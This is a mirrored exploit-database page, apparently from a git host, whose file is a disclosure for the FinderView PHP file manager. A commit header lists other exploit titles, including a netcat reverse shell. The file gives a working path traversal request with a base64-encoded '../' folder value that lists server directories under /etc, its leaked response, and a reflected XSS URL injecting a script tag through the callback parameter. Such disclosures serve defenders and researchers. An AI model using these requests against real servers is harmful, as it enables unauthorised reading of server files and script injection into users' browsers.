bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40011.txt
Offensive Security 3739831fb2 DB: 2016-06-24 
16 new exploits

Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability

PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability
ARM Bindshell port 0x1337
ARM Bind Connect UDP Port 68
ARM Loader Port 0x1337
ARM ifconfig eth0 and Assign Address
ARM Bindshell port 0x1337
ARM Bind Connect UDP Port 68
ARM Loader Port 0x1337
ARM ifconfig eth0 and Assign Address

G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability

ImpressPages CMS 3.8 - Stored XSS Vulnerability

Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery

Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability

Linux Netcat Reverse Shell - 32bit - 77 bytes

PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS
PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS
Getsimple CMS 3.3.10 - Arbitrary File Upload

op5 v7.1.9 Configuration Command Execution
op5 7.1.9 - Configuration Command Execution
Alibaba Clone B2B Script - Arbitrary File Disclosure
XuezhuLi FileSharing - Directory Traversal
XuezhuLi FileSharing - (Add User) CSRF
FinderView - Multiple Vulnerabilities
2016-06-24 05:06:19 +00:00

23 lines
1.7 KiB
Text
Executable file
Raw Blame History

# Exploit Title: FinderView - Multiple Vulnerability(Path Traversal/Reflected XSS)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/proin/
# Software Link: https://github.com/proin/FinderView/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability1 - Path Traversal(view directory)
Request
GET /vul_test/FinderView/api.php?callback=jQuery21107685743998649676_1466662516225&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=1466662516227 HTTP/1.1
Host: 127.0.0.1
..snip..
Connection: keep-alive
Response
jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderuri":"Li4vLi4vLi4vLi4vYmFja3Vwcw==","folderuri_nobase":"../../../../backups","size":"0.0 KB","date":"15 June 2016"},
..snip..
,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January
### Vulnerability2 - Reflected XSS
http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280
Reference in a new issue View git blame Copy permalink